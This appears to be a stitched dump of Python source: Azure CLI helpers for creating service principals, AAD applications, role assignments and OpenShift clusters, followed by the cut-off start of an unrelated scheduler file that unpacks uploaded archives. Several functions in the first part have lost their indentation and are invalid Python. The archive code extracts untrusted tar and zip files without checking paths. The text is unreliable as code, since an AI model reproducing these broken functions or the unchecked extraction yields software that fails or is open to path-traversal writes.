    created = _add_role_assignment(cli_ctx,
                                   'acrpull',
                                   client_id,
                                   scope=registry_id)
    if not created:
        raise CLIError('Could not create a role assignment for ACR. '
                       'Are you an Owner on this subscription?')
def _ensure_aks_service_principal(cli_ctx,
                                  service_principal=None,
                                  client_secret=None,
                                  subscription_id=None,
                                  dns_name_prefix=None,
                                  fqdn_subdomain=None,
                                  location=None,
                                  name=None):
    """Return (creating if necessary) the service principal for an AKS cluster.

    When *service_principal* is not supplied, a new SPN is created with a
    generated secret and a placeholder URL derived from the DNS prefix or the
    FQDN subdomain. When it is supplied, *client_secret* must be supplied too.

    :return: dict with 'client_secret', 'service_principal' and 'aad_session_key'.
    :raises CLIError: if SPN creation fails or a required secret is missing.
    """
    aad_session_key = None
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, make one.
        if not client_secret:
            client_secret = _create_client_secret()
        # Random salt keeps the placeholder URL unique across creations.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        if dns_name_prefix:
            url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
                salt, dns_name_prefix, location)
        else:
            # No DNS prefix: fall back to the FQDN subdomain for the URL.
            url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
                salt, fqdn_subdomain, location)
        service_principal, aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # We don't need to add role assignment for this created SPN
    else:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
        'aad_session_key': aad_session_key,
    }
def _ensure_osa_aad(cmd,
                    cli_ctx,
                    aad_client_app_id=None,
                    aad_client_app_secret=None,
                    aad_tenant_id=None,
                    identifier=None,
                    name=None, create=False,
                    customer_admin_group_id=None):
    """Build the AAD identity-provider profile for an OpenShift managed cluster.

    With *create*, creates (or updates, if one with the same identifier URI
    already exists) an AAD application carrying the required Graph permissions,
    and fills in any missing client secret or tenant ID.

    :return: an OpenShiftManagedClusterAADIdentityProvider model.
    """
    OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
                                                                resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                                operation_group='open_shift_managed_clusters')
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if create:
        # This reply_url is temporary set since Azure need one to create the AAD.
        app_id_name = 'https://{}'.format(name)
        if not aad_client_app_secret:
            aad_client_app_secret = _create_client_secret()
        # Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
        resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
                                         additional_properties=None, type="Scope")
        # Read directory permissions on Windows Azure Active Directory API
        directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
                                          additional_properties=None, type="Role")
        required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
                                                         additional_properties=None,
                                                         resource_app_id="00000002-0000-0000-c000-000000000000")
        # Look for an existing AAD application registered under the same identifier URI.
        list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
                                                               .format(app_id_name)))
        if list_aad_filtered:
            aad_client_app_id = list_aad_filtered[0].app_id
            # Updating reply_url with the correct FQDN information returned by the RP
            reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
                identifier)
            update_application(client=rbac_client.applications,
                               object_id=list_aad_filtered[0].object_id,
                               display_name=name,
                               identifier_uris=[app_id_name],
                               reply_urls=[reply_url],
                               homepage=app_id_name,
                               password=aad_client_app_secret,
                               required_resource_accesses=[required_osa_aad_access])
            logger.info('Updated AAD: %s', aad_client_app_id)
        else:
            # No existing application: register a fresh one.
            result, _aad_session_key = create_application(client=rbac_client.applications,
                                                          display_name=name,
                                                          identifier_uris=[
                                                              app_id_name],
                                                          homepage=app_id_name,
                                                          password=aad_client_app_secret,
                                                          required_resource_accesses=[required_osa_aad_access])
            aad_client_app_id = result.app_id
            logger.info('Created an AAD: %s', aad_client_app_id)
        # Get the TenantID
        if aad_tenant_id is None:
            profile = Profile(cli_ctx=cli_ctx)
            _, _, aad_tenant_id = profile.get_login_credentials()
    return OpenShiftManagedClusterAADIdentityProvider(
        client_id=aad_client_app_id,
        secret=aad_client_app_secret,
        tenant_id=aad_tenant_id,
        kind='AADIdentityProvider',
        customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
                              service_principal=None,
                              client_secret=None,
                              subscription_id=None,
                              dns_name_prefix=None,
                              location=None,
                              name=None):
    """Return (creating if necessary) a service principal for a cluster.

    Unlike _ensure_aks_service_principal, this variant also assigns the
    'Contributor' role to a freshly created SPN.

    :return: dict with 'client_secret' and 'service_principal'.
    :raises CLIError: if SPN creation fails or a required secret is missing.
    """
    # TODO: This really needs to be unit tested.
    rbac_client = get_graph_rbac_management_client(cli_ctx)
    if not service_principal:
        # --service-principal not specified, make one.
        if not client_secret:
            client_secret = _create_client_secret()
        # Random salt keeps the placeholder URL unique across creations.
        salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
        url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
            salt, dns_name_prefix, location)
        service_principal, _aad_session_key = _build_service_principal(
            rbac_client, cli_ctx, name, url, client_secret)
        if not service_principal:
            raise CLIError('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
        logger.info('Created a service principal: %s', service_principal)
        # add role first before save it
        if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
            # Best-effort: the cluster can still be created without the role.
            logger.warning('Could not create a service principal with the right permissions. '
                           'Are you an Owner on this project?')
    else:
        # --service-principal specified, validate --client-secret was too
        if not client_secret:
            raise CLIError(
                '--client-secret is required if --service-principal is specified')
    return {
        'client_secret': client_secret,
        'service_principal': service_principal,
    }
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
    """Return the Azure location of the given resource group.

    The GET also doubles as an existence check: it errors out if the
    resource group does not exist.
    """
    groups_client = cf_resource_groups(ctx, subscription_id=subscription_id)
    return groups_client.get(resource_group_name).location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
    """Merge an unencrypted kubeconfig into the file at the specified path, or print it to
    stdout if the path is "-".
    """
    # Special case for printing to stdout
    if path == "-":
        print(kubeconfig)
        return
    # ensure that at least an empty ~/.kube/config exists
    directory = os.path.dirname(path)
    if directory and not os.path.exists(directory):
        try:
            os.makedirs(directory)
        except OSError as ex:
            # Tolerate a concurrent creation of the same directory.
            if ex.errno != errno.EEXIST:
                raise
    if not os.path.exists(path):
        # Create the file with owner-only permissions (0600) since it holds credentials.
        with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
            pass
    # merge the new kubeconfig into the existing one
    fd, temp_path = tempfile.mkstemp()
    additional_file = os.fdopen(fd, 'w+t')
    try:
        additional_file.write(kubeconfig)
        additional_file.flush()
        merge_kubernetes_configurations(
            path, temp_path, overwrite_existing, context_name)
    except yaml.YAMLError as ex:
        # A malformed config is reported but not fatal.
        logger.warning(
            'Failed to merge credentials to kube config file: %s', ex)
    finally:
        # Always remove the temp file used to stage the incoming kubeconfig.
        additional_file.close()
        os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
    """List OpenShift managed clusters, optionally scoped to one resource group."""
    clusters = (client.list_by_resource_group(resource_group_name)
                if resource_group_name else client.list())
    # Strip the always-null fields before handing the list back to the CLI.
    return _remove_osa_nulls(list(clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
def openshift_create(cmd, client, resource_group_name, name,  # pylint: disable=too-many-locals
                     location=None,
                     compute_vm_size="Standard_D4s_v3",
                     compute_count=3,
                     aad_client_app_id=None,
                     aad_client_app_secret=None,
                     aad_tenant_id=None,
                     vnet_prefix="10.0.0.0/8",
                     subnet_prefix="10.0.0.0/24",
                     vnet_peer=None,
                     tags=None,
                     no_wait=False,
                     workspace_id=None,
                     customer_admin_group_id=None):
    """Create an OpenShift (ARO 3.11) managed cluster.

    Assembles compute/infra/master pool profiles, an AAD identity provider
    (created on demand when none of the AAD flags are given and the cluster
    does not already exist), optional VNet peering and Log Analytics
    monitoring, then submits the cluster and finally updates the AAD app's
    reply URL with the cluster's public hostname.

    :raises CLIError: if the subscription is not enabled for the service.
    """
    OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
                                                   resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                   operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
                                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                             operation_group='open_shift_managed_clusters')
    OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
                                             resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                             operation_group='open_shift_managed_clusters')
    OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
                                            resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                            operation_group='open_shift_managed_clusters')
    NetworkProfile = cmd.get_models('NetworkProfile',
                                    resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                    operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
                                                        resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                        operation_group='open_shift_managed_clusters')
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    # Default the cluster location to its resource group's location.
    if location is None:
        location = _get_rg_location(cmd.cli_ctx, resource_group_name)
    agent_pool_profiles = []
    agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='compute',  # Must be 12 chars or less before ACS RP adds to it
        count=int(compute_count),
        vm_size=compute_vm_size,
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.compute,
        subnet_cidr=subnet_prefix
    )
    agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='infra',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        role=OpenShiftAgentPoolProfileRole.infra,
        subnet_cidr=subnet_prefix
    )
    agent_pool_profiles.append(agent_node_pool_profile)
    agent_pool_profiles.append(agent_infra_pool_profile)
    agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
        name='master',  # Must be 12 chars or less before ACS RP adds to it
        count=int(3),
        vm_size="Standard_D4s_v3",
        os_type="Linux",
        subnet_cidr=subnet_prefix
    )
    identity_providers = []
    create_aad = False
    # Validating if the cluster is not existing since we are not supporting the AAD rotation on OSA for now
    try:
        client.get(resource_group_name, name)
    except CloudError:
        # Validating if aad_client_app_id aad_client_app_secret aad_tenant_id are set
        if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
            create_aad = True
        osa_aad_identity = _ensure_osa_aad(cmd,
                                           cmd.cli_ctx,
                                           aad_client_app_id=aad_client_app_id,
                                           aad_client_app_secret=aad_client_app_secret,
                                           aad_tenant_id=aad_tenant_id, identifier=None,
                                           name=name, create=create_aad,
                                           customer_admin_group_id=customer_admin_group_id)
        identity_providers.append(
            OpenShiftManagedClusterIdentityProvider(
                name='Azure AD',
                provider=osa_aad_identity
            )
        )
    auth_profile = OpenShiftManagedClusterAuthProfile(
        identity_providers=identity_providers)
    default_router_profile = OpenShiftRouterProfile(name='default')
    # A bare VNet name is expanded into a full resource ID in the cluster's
    # own resource group before peering.
    if vnet_peer is not None:
        from msrestazure.tools import is_valid_resource_id, resource_id
        if not is_valid_resource_id(vnet_peer):
            vnet_peer = resource_id(
                subscription=get_subscription_id(cmd.cli_ctx),
                resource_group=resource_group_name,
                namespace='Microsoft.Network', type='virtualNetwork',
                name=vnet_peer
            )
    if workspace_id is not None:
        workspace_id = _format_workspace_id(workspace_id)
        monitor_profile = OpenShiftManagedClusterMonitorProfile(
            enabled=True, workspace_resource_id=workspace_id)  # pylint: disable=line-too-long
    else:
        monitor_profile = None
    network_profile = NetworkProfile(
        vnet_cidr=vnet_prefix, peer_vnet_id=vnet_peer)
    osamc = OpenShiftManagedCluster(
        location=location, tags=tags,
        open_shift_version="v3.11",
        network_profile=network_profile,
        auth_profile=auth_profile,
        agent_pool_profiles=agent_pool_profiles,
        master_pool_profile=agent_master_pool_profile,
        router_profiles=[default_router_profile],
        monitor_profile=monitor_profile)
    try:
        # long_running_operation_timeout=300
        result = sdk_no_wait(no_wait, client.begin_create_or_update,
                             resource_group_name=resource_group_name, resource_name=name, parameters=osamc)
        result = LongRunningOperation(cmd.cli_ctx)(result)
        instance = client.get(resource_group_name, name)
        # Second pass fixes the AAD app's reply URL using the cluster's real hostname.
        # NOTE(review): osa_aad_identity is only bound when the earlier client.get
        # raised CloudError (cluster did not exist); re-running create on an
        # existing cluster would hit a NameError here — confirm intended.
        _ensure_osa_aad(cmd,
                        cmd.cli_ctx,
                        aad_client_app_id=osa_aad_identity.client_id,
                        aad_client_app_secret=osa_aad_identity.secret,
                        aad_tenant_id=osa_aad_identity.tenant_id, identifier=instance.public_hostname,
                        name=name, create=create_aad)
    except CloudError as ex:
        if "The resource type could not be found in the namespace 'Microsoft.ContainerService" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        if "No registered resource provider found for location" in ex.message:
            raise CLIError(
                'Please make sure your subscription is whitelisted to use this service. https://aka.ms/openshift/managed')  # pylint: disable=line-too-long
        raise ex
def openshift_show(cmd, client, resource_group_name, name):
    """Show an OpenShift managed cluster with distracting null fields removed."""
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    cluster = client.get(resource_group_name, name)
    return _remove_osa_nulls([cluster])[0]
def openshift_scale(cmd, client, resource_group_name, name, compute_count, no_wait=False):
    """Scale the 'compute' agent pool of an OpenShift cluster to *compute_count* nodes.

    Falls back to the first pool (index 0) when no pool named 'compute' exists.
    """
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # TODO: change this approach when we support multiple agent pools.
    idx = 0
    # enumerate() replaces the index-based range(len(...)) loop.
    for i, profile in enumerate(instance.agent_pool_profiles):
        if profile.name.lower() == "compute":
            idx = i
            break
    instance.agent_pool_profiles[idx].count = int(
        compute_count)  # pylint: disable=no-member
    # null out the AAD profile and add manually the masterAP name because otherwise validation complains
    instance.master_pool_profile.name = "master"
    instance.auth_profile = None
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_enable(cmd, client, resource_group_name, name, workspace_id, no_wait=False):
    """Enable Log Analytics monitoring on an OpenShift cluster."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # Attach a monitor profile pointing at the normalized workspace resource ID.
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=True,
        workspace_resource_id=_format_workspace_id(workspace_id))
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def openshift_monitor_disable(cmd, client, resource_group_name, name, no_wait=False):
    """Disable Log Analytics monitoring on an OpenShift cluster."""
    OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
                                                           resource_type=ResourceType.MGMT_CONTAINERSERVICE,
                                                           operation_group='open_shift_managed_clusters')
    logger.warning('The az openshift command is deprecated and has been replaced by az aro for ARO 4 clusters. See http://aka.ms/aro/4 for information on switching to ARO 4.')  # pylint: disable=line-too-long
    instance = client.get(resource_group_name, name)
    # Replace any existing profile with a disabled one and clear the workspace link.
    instance.monitor_profile = OpenShiftManagedClusterMonitorProfile(
        enabled=False,
        workspace_resource_id=None)
    return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def _is_msi_cluster(managed_cluster):
return (managed_cluster and managed_cluster.identity and
(managed_cluster.identity.type.casefold() == "systemassigned" or
managed_cluster.identity.type.casefold() == "userassigned"))
def _put_managed_cluster_ensuring_permission(
        cmd,     # pylint: disable=too-many-locals,too-many-statements,too-many-branches
        client,
        subscription_id,
        resource_group_name,
        name,
        managed_cluster,
        monitoring_addon_enabled,
        ingress_appgw_addon_enabled,
        virtual_node_addon_enabled,
        need_grant_vnet_permission_to_cluster_identity,
        vnet_subnet_id,
        enable_managed_identity,
        attach_acr,
        headers,
        no_wait
):
    """Create or update the managed cluster, then grant any role assignments
    that can only be made once the cluster (and its identities) exist.

    When no post-creation role assignment is needed, the PUT is issued with
    sdk_no_wait so --no-wait is honored; otherwise the operation is awaited
    first because the assignments need the resulting cluster object.

    :return: the created/updated cluster (or the poller when fired-and-forgotten).
    """
    # some addons require post cluster creation role assigment
    need_post_creation_role_assignment = (monitoring_addon_enabled or
                                          ingress_appgw_addon_enabled or
                                          (enable_managed_identity and attach_acr) or
                                          virtual_node_addon_enabled or
                                          need_grant_vnet_permission_to_cluster_identity)
    if need_post_creation_role_assignment:
        # adding a wait here since we rely on the result for role assignment
        cluster = LongRunningOperation(cmd.cli_ctx)(client.begin_create_or_update(
            resource_group_name=resource_group_name,
            resource_name=name,
            parameters=managed_cluster,
            headers=headers))
        cloud_name = cmd.cli_ctx.cloud.name
        # add cluster spn/msi Monitoring Metrics Publisher role assignment to publish metrics to MDM
        # mdm metrics is supported only in azure public cloud, so add the role assignment only in this cloud
        if monitoring_addon_enabled and cloud_name.lower() == 'azurecloud':
            from msrestazure.tools import resource_id
            cluster_resource_id = resource_id(
                subscription=subscription_id,
                resource_group=resource_group_name,
                namespace='Microsoft.ContainerService', type='managedClusters',
                name=name
            )
            _add_monitoring_role_assignment(cluster, cluster_resource_id, cmd)
        if ingress_appgw_addon_enabled:
            _add_ingress_appgw_addon_role_assignment(cluster, cmd)
        if virtual_node_addon_enabled:
            _add_virtual_node_role_assignment(cmd, cluster, vnet_subnet_id)
        if need_grant_vnet_permission_to_cluster_identity:
            # Best-effort: a failed subnet role assignment only warns.
            if not _create_role_assignment(cmd.cli_ctx, 'Network Contributor',
                                           cluster.identity.principal_id, scope=vnet_subnet_id,
                                           resolve_assignee=False):
                logger.warning('Could not create a role assignment for subnet. '
                               'Are you an Owner on this subscription?')
        if enable_managed_identity and attach_acr:
            # Attach ACR to cluster enabled managed identity
            if cluster.identity_profile is None or \
                    cluster.identity_profile["kubeletidentity"] is None:
                logger.warning('Your cluster is successfully created, but we failed to attach '
                               'acr to it, you can manually grant permission to the identity '
                               'named <ClUSTER_NAME>-agentpool in MC_ resource group to give '
                               'it permission to pull from ACR.')
            else:
                # The kubelet identity is what pulls images, so it gets 'acrpull'.
                kubelet_identity_client_id = cluster.identity_profile["kubeletidentity"].client_id
                _ensure_aks_acr(cmd.cli_ctx,
                                client_id=kubelet_identity_client_id,
                                acr_name_or_id=attach_acr,
                                subscription_id=subscription_id)
    else:
        # No role assignments needed: honor --no-wait on the PUT itself.
        cluster = sdk_no_wait(no_wait, client.begin_create_or_update,
                              resource_group_name=resource_group_name,
                              resource_name=name,
                              parameters=managed_cluster,
                              headers=headers)
    return cluster
def _ensure_cluster_identity_permission_on_kubelet_identity(cli_ctx, cluster_identity_object_id, scope):
    """Ensure the cluster identity holds Managed Identity Operator on *scope*.

    Scans the existing role assignments at the given scope and returns
    immediately if the grant is already present; otherwise creates it,
    raising UnauthorizedError when the assignment cannot be made.
    """
    role_assignments = get_auth_management_client(cli_ctx, scope).role_assignments
    target_principal = cluster_identity_object_id.lower()
    for assignment in role_assignments.list_for_scope(scope=scope, filter='atScope()'):
        same_scope = assignment.scope.lower() == scope.lower()
        is_operator_role = assignment.role_definition_id.lower().endswith(
            CONST_MANAGED_IDENTITY_OPERATOR_ROLE_ID)
        same_principal = assignment.principal_id.lower() == target_principal
        if same_scope and is_operator_role and same_principal:
            # role already granted; nothing to do
            return
    created = _add_role_assignment(cli_ctx, CONST_MANAGED_IDENTITY_OPERATOR_ROLE,
                                   cluster_identity_object_id,
                                   is_service_principal=False, scope=scope)
    if not created:
        raise UnauthorizedError('Could not grant Managed Identity Operator '
                                'permission to cluster identity at scope {}'.format(scope))
|
scheduler_old.py | '''
This is the application scheduler.
It defines scheduled tasks and runs them as per their defined schedule.
This scheduler is started and stopped when the app is started and stopped.
Unless RUN_SCHEDULE is set to False in the config. In which case it must be started manually / managed by supervisor.
It is presumed to run on one machine at present.
If scaling later requires having multiple machines, then this scheduler should only run on the machine that has access to
the relevant directories. There is a task that moves files from ftp user jail directories to tmp processing locations, and
this is the limitation - creating sftp accounts has to happen on one machine or across machines, but that would increase
attack surface for security vulnerability. So probably better to have only one machine open to sftp, and if necessary for
later scale the script that is called to move data from the sftp jails to processing locations could do so by round-robin
to multiple processing machines. The jper app config has settings for running this scheduler and what frequencies to run each
process, so it is just a case of installing jper on each machine but only setting the frequencies for the processes desired to
be scheduled on each given machine.
Or, if scheduled tasks themselves also need to be scaled up, the scheduler can continue to run on
all machines but some synchronisation would have to be added so that tasks were not run on every machine. Also, each machine
running the schedule would need access to any relevant directories.
'''
import schedule, time, os, shutil, requests, datetime, tarfile, zipfile, subprocess, getpass, uuid, json, csv
from threading import Thread
from octopus.core import app, initialise
from service import reports
from . import models
if app.config.get('DEEPGREEN_EZB_ROUTING', False):
from . import routing_deepgreen as routing
else:
from . import routing
# functions for the checkftp to unzip and move stuff up then zip again in incoming packages
def zip(src, dst):
    """Recursively zip the contents of directory *src* into archive *dst*.

    Arcnames inside the archive are taken relative to *src*.
    NOTE: this intentionally shadows the builtin zip() within this module.
    """
    abs_src = os.path.abspath(src)
    # "with" guarantees the archive is finalized/closed even if a write fails
    # (the original leaked an open, possibly truncated archive on error)
    with zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zf:
        for dirname, subdirs, files in os.walk(src):
            for filename in files:
                absname = os.path.abspath(os.path.join(dirname, filename))
                # store paths relative to src inside the archive
                arcname = absname[len(abs_src) + 1:]
                zf.write(absname, arcname)
def extract(fl, path):
    """Unpack archive *fl* (tar or zip) into directory *path*.

    Tries tar first and falls back to zip on any failure; returns True on
    success, False when neither method could unpack the file.
    """
    app.logger.debug('Extracting ' + fl)
    try:
        # TODO the tar method has not yet been tested...
        # context manager closes the tar even if extraction fails
        with tarfile.open(fl) as tar:
            # 2019-11-18 TD : add the actual path for extraction here
            tar.extractall(path=path)
        app.logger.debug('Extracted tar ' + fl)
        return True
    except Exception:
        # not readable as tar -- fall back to zip; "except Exception"
        # rather than bare "except" so KeyboardInterrupt/SystemExit are
        # not swallowed
        try:
            with zipfile.ZipFile(fl) as zf:
                # 2019-11-18 TD : replace the 'hand made' routine by the library call
                zf.extractall(path=path)
            app.logger.debug('Extracted zip ' + fl)
            return True
        except Exception as e:
            app.logger.error('Scheduler - Extraction could not be done for ' + fl + ' : "{x}"'.format(x=str(e)))
            return False
def flatten(destination, depth=None):
    """Recursively flatten an unpacked delivery below *destination*.

    Archives found below *depth* are extracted in place and removed; plain
    files are moved up to *destination*. An .xml file in a folder marks that
    folder as a single publication (recursion stop): its files are moved
    into a dedicated <destination>/<stem> folder instead, which supports
    bulk deliveries containing many publications in one zip.

    :param destination: top-level folder receiving the flattened content
    :param depth: current folder being processed (defaults to destination)
    """
    if depth is None:
        depth = destination
        app.logger.debug('Flatten depth set ' + destination + ' ' + depth)
    #
    # 2019-11-18 TD : Introducing the '.xml' file as recursion stop.
    # If an .xml file is found in a folder in the .zip file then this
    # *is* a single publication to be separated from the enclosing .zip file
    has_xml = False
    for fl in os.listdir(depth):
        if 'article_metadata.xml' in fl: # De Gruyter provides a second .xml sometimes, sigh.
            os.remove(depth + '/' + fl)
            continue
        if not has_xml and '.xml' in fl:
            app.logger.debug('Flatten ' + fl + ' found in folder')
            has_xml = True
            # stem = <top folder name>/<xml basename>; target folder for this pub
            words = destination.split('/')
            stem = words[-1] + '/' + os.path.splitext(fl)[0]
            if not os.path.exists(destination + '/' + stem):
                os.makedirs(destination + '/' + stem)
                app.logger.debug('Flatten new ' + destination + '/' + stem + ' created')
    # 2019-11-18 TD : end of recursion stop marker search
    #
    for fl in os.listdir(depth):
        app.logger.debug('Flatten at ' + fl)
        # 2019-11-18 TD : Additional check for 'has_xml' (the stop marker)
        # if '.zip' in fl: # or '.tar' in fl:
        if not has_xml and '.zip' in fl: # or '.tar' in fl:
            app.logger.debug('Flatten ' + fl + ' is an archive')
            extracted = extract(depth + '/' + fl, depth)
            if extracted:
                app.logger.debug('Flatten ' + fl + ' is extracted')
                os.remove(depth + '/' + fl)
                # re-scan the same depth now that the archive is unpacked
                flatten(destination,depth)
        # 2019-11-18 TD : Additional check for 'has_xml' (the stop marker)
        # elif os.path.isdir(depth + '/' + fl):
        elif os.path.isdir(depth + '/' + fl) and not has_xml:
            app.logger.debug('Flatten ' + fl + ' is not a file, flattening')
            flatten(destination, depth + '/' + fl)
        else:
            try:
                # shutil.move(depth + '/' + fl, destination)
                # 2019-11-18 TD : Some 'new' +stem dst place to move all the single pubs into
